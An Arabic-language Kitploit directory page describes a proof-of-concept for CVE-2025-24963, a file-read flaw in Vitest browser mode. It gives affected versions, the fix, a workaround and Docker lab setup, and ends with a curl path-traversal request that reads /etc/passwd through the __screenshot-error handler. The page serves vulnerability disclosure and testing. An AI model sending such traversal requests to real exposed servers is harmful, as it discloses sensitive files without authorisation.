Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24963 — استغلال إثبات المفهوم لـ CVE-2025-24963، وهي ثغرة قراءة ملفات محلية في وضع المتصفح لـ Vitest عبر معالج __screenshot-error، مما يتيح الكشف التعسفي عن الملفات على الخوادم المكشوفة. | Kitploit
أدوات/GitHubGitHub/hiteshpatra/cve-2025-24963
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

استغلال إثبات المفهوم لـ CVE-2025-24963، وهي ثغرة قراءة ملفات محلية في وضع المتصفح لـ Vitest عبر معالج __screenshot-error، مما يتيح الكشف التعسفي عن الملفات على الخوادم المكشوفة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24963 - وضع متصفح Vitest - قراءة ملف محلي

​CVE-2025-24963 هو ثغرة أمنية متوسطة الخطورة (درجة CVSS 3.1: 5.9) تؤثر على حزمة @vitest/browser، وهي مكون من إطار اختبار Vitest المدعوم من Vite. تنشأ هذه الثغرة من التحقق غير السليم من الإدخال في معالج __screenshot-error لخادم HTTP في وضع المتصفح. عندما يتم تعريض الخادم للشبكة باستخدام خيار التهيئة browser.api.host: true، يمكن للمهاجم إرسال طلبات مصممة خصيصًا للوصول إلى ملفات عشوائية على نظام ملفات الخادم، مما قد يؤدي إلى الكشف غير المصرح به عن معلومات حساسة.

الإصدارات المتأثرة

تؤثر الثغرة على الإصدارات التالية من @vitest/browser:​

  • 2.0.4 إلى 2.1.8
  • 3.0.0 إلى 3.0.3​

التخفيف

تمت معالجة هذه المشكلة في الإصدارين 2.1.9 و 3.0.4. يُنصح المستخدمون بشدة بالترقية إلى هذه الإصدارات أو الأحدث للتخفيف من الثغرة.​

حل بديل

إذا لم يكن الترقية الفورية ممكنة، فإن الحل البديل المؤقت هو تجنب تعريض خادم وضع المتصفح للشبكة عن طريق عدم تعيين browser.api.host: true في التهيئة الخاصة بك. سيمنع هذا الوصول الخارجي إلى المعالج المعرض للخطر.

إعداد البيئة

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

ملاحظة: المنفذ الذي يستخدمه Vitest ديناميكي (على سبيل المثال، 63315). قد ترغب في مراقبة السجلات وضبط علامة -p وفقًا لذلك.

الاستغلال

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
تنزيل الأداة